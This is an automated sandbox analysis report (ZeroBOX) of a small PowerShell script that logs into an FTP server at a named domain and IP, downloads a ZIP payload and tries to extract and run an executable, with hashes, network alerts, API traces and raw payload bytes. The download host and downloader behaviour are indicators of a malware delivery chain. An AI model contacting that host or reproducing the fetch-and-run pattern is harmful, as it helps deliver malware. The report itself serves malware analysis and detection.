Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 5, 2025, 11:01 a.m.	Feb. 5, 2025, 11:05 a.m.

Size	1.0KB
Type	ASCII text
MD5	`7de4a17dfc66695461f0c6a70ca4ec49`
SHA256	`ee5775b3e3d293257a13bbed6b04a273deb4b92ab32c06b25228c2d581c52523`
CRC32	`F14A89E3`
ssdeep	`24:VU79N1K28Tm1K2n5gn4d1K2N85m9yRuifVAeABvQ1K22ft3vSO:eT1KPm1KId1KStyRuifbAS1KltSO`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\32.ps1
2556

Name	Response	Post-Analysis Lookup
shaileshvisionaryastrologer.com	A 167.86.109.19	167.86.109.19

IP Address	Status	Action
164.124.101.2	Active	Moloch
167.86.109.19	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 167.86.109.19:21 -> 192.168.56.101:49163	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
TCP 167.86.109.19:33518 -> 192.168.56.101:49164	2035482	ET HUNTING ZIP file download over raw TCP	Misc activity
TCP 192.168.56.101:49164 -> 167.86.109.19:33518	2260003	SURICATA Applayer Protocol detection skipped	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Feb. 5, 2025, 11:01 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (28 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: Add-Type : Cannot add type. The assembly 'System.IO.Compression.FileSystem' cou console_handle: 0x00000023	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: ld not be found. console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:15 char:9 console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + Add-Type <<<< -AssemblyName System.IO.Compression.FileSystem console_handle: 0x00000047	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + CategoryInfo : ObjectNotFound: (System.IO.Compression.FileSyste console_handle: 0x00000053	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: m:String) [Add-Type], Exception console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + FullyQualifiedErrorId : ASSEMBLY_NOT_FOUND,Microsoft.PowerShell.Commands console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: .AddTypeCommand console_handle: 0x00000077	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: Add-Type : Cannot add type. One or more required assemblies are missing. console_handle: 0x00000097	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:15 char:9 console_handle: 0x000000a3	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + Add-Type <<<< -AssemblyName System.IO.Compression.FileSystem console_handle: 0x000000af	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + CategoryInfo : InvalidData: (:) [Add-Type], InvalidOperationExc console_handle: 0x000000bb	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: eption console_handle: 0x000000c7	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + FullyQualifiedErrorId : ASSEMBLY_LOAD_ERRORS,Microsoft.PowerShell.Comman console_handle: 0x000000d3	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: ds.AddTypeCommand console_handle: 0x000000df	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: Unable to find type [System.IO.Compression.ZipFile]: make sure that the assembl console_handle: 0x000000ff	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: y containing this type is loaded. console_handle: 0x0000010b	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:16 char:32 console_handle: 0x00000117	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + [System.IO.Compression.ZipFile] <<<< ::ExtractToDirectory($r, $g) console_handle: 0x00000123	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + CategoryInfo : InvalidOperation: (System.IO.Compression.ZipFile console_handle: 0x0000012f	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: :String) [], RuntimeException console_handle: 0x0000013b	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x00000147	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\32.ps1 : Executable not found in extracted f console_handle: 0x00000167	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: older. console_handle: 0x00000173	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep console_handle: 0x0000017f	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: tion console_handle: 0x0000018b	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio console_handle: 0x00000197	1	1
WriteConsoleW Feb. 5, 2025, 11:01 a.m.	buffer: n,32.ps1 console_handle: 0x000001a3	1	1

Uses Windows APIs to generate a cryptographic key (11 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 5, 2025, 11:01 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 5, 2025, 11:01 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (36 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02679000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02739000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 5, 2025, 11:01 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Feb. 5, 2025, 11:01 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (12 events)

Data received	220 Microsoft FTP Service
Data received	331 Password required
Data received	230 User logged in.
Data received	200 OPTS UTF8 command successful - UTF8 encoding now ON.
Data received	257 "/" is current directory.
Data received	250 CWD command successful.
Data received	200 Type set to I.
Data received	227 Entering Passive Mode (167,86,109,19,130,238).
Data received	150 Opening BINARY mode data connection.
Data received	7,-ý<ÆSG1æâ±ÆàüKGV÷%õ¯$\_RÔæäå_~_üC³óm"8ÿ2)óPwñn\C%À÷Ë"hÃºÆK/CØ´Nøù6Ù0E¹-ZmÁ`ºðÿ8{Ost¦ýß÷È\rþÒå¨J7ÍÅ¯z£#É¬®Ä²òÙ¨fhú×\|Ëª¸Ì,bHXc½sHæ¨_UµWx´áKèÝÑ-á>©õñÝ¦å&&ý\|ùô~^dÉT¹TÛÌw©ØáDEO»À;ÿc&ÅíìyN[5 `ýlüÌ þU»0ÓÕ¢\\=;·,A³Æ.\|øªIwº/ÿ/!ê-M¯0·8à¨"DE¶¿ùÈ\|è\raÂµ[WGp³â¾kà(»¿»wSs³µ³C¿±[ÿ¬?¤Áäìüä²ð5îªÃ+ Þïïp¹Ý?ýÿªð¢LÊ¬²=1Z ÿæ$Uÿ;ÿíXÛá¦øFJP}ð·R£Ü§+·ßXUqÐzßô-ºlH.<¬ÿøoyðÑùÊå10þËVü wê»¶ÿ#;¸!×c¨½÷SgÃX®åEó®Pqk[v¼Ó{dlþe¾wJWVÿ&j´c¤-·×²Kûà1A½f!fõ¿KÞ¢©=û²?æ¨Ìó5VÿpoflZ©µ+ááêýL¥~YX$¥vØ?´%{®qDÌ¡ÄòM÷µ6Ç;nEúJÊBæ¼BÀiø÷ay57VÃf¿¦êùÄ"êó è?²ýÂ§ÎÎlÑxVÑø>l'nò[~ßa0ß,3þÅ¶L4Åì¯¿ÕVÙ°Ïy"rcÐQê·óv)T£U9¿ ¥Ï^ÿÑ§¿µ 4ÈµRQz¶Ëûø%v4Qù´:CñtB$ßÌoÜ¬§£h ÿQO aCPX°õÎþÄd=óþ #¶ñà<L°è ¶Rïõ¿9cLm=ÞK£ù÷t% ùÕ×¢UÞã'Wmí%¦Ô'«³sÖwå{êOh4Eúx5ÇRj.[Z;£H~×vÑË¶{¾¹æpH¬9ò¹ @Õ¿~P«G(¹O_Í)ðAÌ¿"ã´FwÜïbTÆvzª5TØÝiè³1ô-ìùç_Ï'9R±Íi»«Sðª'÷¾p¬5lýZ» û1%¸IöFñ%à¬¶tWì×<üÑ² ù$óßùg¥¼Å¶ ìýÖôY6¢W ËðpöÓñnðÇ·Ö£t-qýÏ\ÑÞ)_àñ'þÓÀÆìÉÈ F³GÏËZ¾4ºRã§C'ksÓ9åãêl¥/üßÑÙà~B}ôÿÒ/wÏfMCr»àÌJ½¨:ãóÝlHÏØl´âYû¯àýûOñîã©ÑÑêàbú8fÌu´¤A°~i{9^QNÑ¶òW¹[;÷õßÀøþÝ©µpð3¢åN¾'à»À£{¦¶øzD@ðm0JU·,Kwr+´6ÿÌJqÂ¤uI[0ã!ù- îz$ûIjj8°Çv6ÓVAC9Aã'ðYq$xø?Ü`þ×ÀtðÙ×\ÀÿsþüMM ögßáêüBÉtÉ².gá&çøË%I8¸{þÅ$º/îãfÙpþcMþtô8ÿjÒ¡þ'Üke»mËÂ}ÿü©¹AT-,ÉíOt IÖ?\|ôB}xø?6Â~/TÏUÔllìH½} êEúi J¥Bê£ââ"º-CÚT-õÞ7ê5ÓLpm$ß¯Û:{»»zÌ?ý3o8å0'§ ûáÚà?:}gö¤:0ý³Ýxo^_¸n(ýMJ@¶³yäCN¾± í½¸ôwþä¶¹ÈÇöêûPk×²;7OûÂ4tmq)YÝÕ>Og¸J ¾ÿÅsùMn þyò½æ"¥µïcí0DÿZ6TXVîøÂ7ÍÈÃ ðÏÆãN\|Ówtp·PLwÈÂü z6¶¿ÌIõ<ãÿä£Ã®¾ÆD{ê>4ô?]DÔõZ¾Õðk+º²u¦½Í-ýÏwT:bDÙ£ê ¬\|éåÉXyWCÃxØú¬¢\ÔÊmCÃµ$PÎ¨nÅßoìCIPOö!¿lXÀE®þ×édt{'Ùr.Îæö´þó³]u4ô>ò[ÐÙÁá09cWÎFÅ «`í\ñèÑsPÿXtÄîýÃ:øçþ®¨êjMæTë½ÂäFTWtËøüÁq¾DºþgÐit°©ÑîÓ/>ØÑ1£?Û'b@ì>nÆþ§1¡ÑgÐÿm7´\|ëäÇJ ø·½Zõ õ,"òjnEÙ9ô!ùDK5eªC·ë{þî3íÔ@ÿ²æ¹ÎW±å]\üêàþ'¡îõpùÞð(ûªÿP_]QEzû¾hÇÒØjô¿w{ÒÒ÷÷ÿ]JW8ÇuÒá5ü=KM(ëU¸Í¬+¥vÁý'±ÔÿÛnB»`þ=»±¿¬¤ð¯û¸4fSæ÷ÿ³LràxÿûÂöÿ úÐa?(ÈßãðrÃ'=ãU]ß&àP¬ÇZa'OÆxã«ýOôÄ¦ßã $Ñ³ÉÉ{ý@^^fm]:~¡µ½½Foæ«,Ôä½ªm)ÿK0Ãÿ^aðïF5jû"£yÆÕúPi'±X±<[¨Ý²xs£ÿØÞÃäÉ²ªRP\|Þ±}¹fQ¿°$Ô%¾qøÙjwû¡¦(_d4O >Ö¬6<-(gæfu®KÖ¶ÊvÎÅzeý3"ùoÙQÊBókì©è¸@ÁhÀÿ #µ»£}Fæëùâ9á>Þz6¶Ëî«$ØÚàþK4eèÉfgûKÏ¦²aù¡÷aþ¯ñ¤¼½kÌUñG ú@HøyÎï¨'ÐúëÄýY;+¤>õ0A]_³K¼~Ëpàöð<¯BÊ¿RÎ8þÿj}Óã» ÿbB=mw\|½Cñ#Ä°Þ@ 5GÇ5 `cÖÅZª%P´ñ¼0[l4mJ[ D·©øÏ¦ yÇSX ¨jS\|RWÿìÒ¸Úþp´`v8"ì%3ã¢'Èÿ7WpÂÅ2èÿRæFM'Ä®nBÿÙ òCv´øýf~OÎZ½QvÀ¿ùá«Á\|+Íw¦p$"úúÏw)¹æµ<¡ÈÇJïhÅÿjFO H¤Ìúà]&D'²"OîüOYYøçö¨ÎßÏ,ò³1OÞýgÏöe"ÄX(~ALBbùó²h?÷»ë½ØË³Ï#È¦ÆX,ï_µtsþõ7¡`5êßOÇ\|Ø¦óÿc)Oc~2_kºè¿ãÓ°óÿçÿ×£øNÞÒÞîøËûóCAgøú0ý'öþÓ}@±BÙþçÛëäCÀ¿^~l
Data received	3¢TÏ°®AæÀu{&îM.=$îWó°Á'û-úßW¿í¢My?6k`µzVë-õzÐãAÏú}ì}çöÛídËéõÔÙP©w¤9ê}P}Ë5Kç a\ÉÑuâKX.©l¯I¥kGwmn ÿ3«¸EèîB]æ)¨¹ü7èÊ4ÎðQyk+qëéê^_¸s¶çêçêó8ù«°Ú¹Û) õäæQNÝXT++ïçÄívNÛþHÿ3SÞ½½ä®°5ÑËÕÿ¾ú·ÿkMÏõG¶\|Ú{a_.õ¼\|ãà³öïN¼ýv0©\ÒïGSZ¦hÉü¸Z!->ãEÖÂÌ¬ÜÛù?r{åw@ö×]YºÃÏ¯_.~øé/ ²¯þÎ¥óÚ?ºúw{èê\¾î©i³1_70ý6FÛ¼º$]:ãÛ©8vê´½ÚkxÐ;¯~ã ¿ÊLl4¬GÍÝQM¢Foª0¹ÆÆ·ÛF×\|húìÉ¿etÒÉßñE§?ºìÞ¢o¥nÚlº£Ú³j¦U.\kð¯6WmT9¹BÍz·êÃöíÒ\|2MÔ§ê¼¯úWåGWÞZ©yåÈò+âº_êPx÷à¼ ¨»²Í/ßÚüI?nÎöTíÞ§E/=iõôý5úÇ¬½Óz§ÝOÉNÎøÒôÃý?y¾üýmÚ÷·I?K§Û2eø~uMûþ¶Ëj§ÂOß»Öðþ'lâôÃÞÄâÿûé¸\|èÆ9ën>¹Ñ¸Ñ½#w_¥C³õ8n?Þâoê¢vQ:·ùâ·«ÂáúÔV>ûýÿ6öGZjÌ¹Æ´ú) ¿Y¾výº+åDê´u\|Gú59ÔV5tiðºÈÑ%]%n] éë`ÃPPöC=Dé>ì ÜñÖÖäÕóãj\6´R +m«1¸ÑnÏ Ê6npÄG¶O)sªßÔÖÙÍúÖNªQXû{³Þ©>úÆÍX4ùÿ®HÕþ\;wôêÓ#&õ°qüòQÙ\Ô°obæ=õ]R;Ïiÿ«õï[4]\¿omkø~$×e~þ_)¡]é!Ñ¢gÛÖ1ßF §~ëZsMWÌtÙ~wúÈ÷3>ù.¿ÙßãHü¹³OüÆÿöß±Ói}]ñ¥\|ÒÔ¡ã.ºðeeÛ%Û?~òø)ygÇÆuKþçz×\utÏÚ¿ÎÎ½Xé¬t<Øk÷ª]ÃwÐ{Xr4ã\Ò_ºgnÈ¹QÈgK:øåôçßÇ']IÊ(ÌÛÁ§GµNX^jxXênú§-¹cêx¢ ªo©Òu¿ÞíRô1àCÖçKþþueúuÚ!zÈãá'úÉ\|¡k¤È151Ut}é¹xiö+<af©¼NÆÃ¿VÙ\|«ÈÜÆ:}êq©6ò}\\|ò?:\íhoy¦_ávÅ=µ;´ø«ùzÍª]ª¹»FZû9CFÞþ¯ÌéâÄþÝzw~Ýãû°á£ä!¯»ÿn´¬þÖ²q±KÇÆ÷IxVvI?ê~iR¯iRÓ1 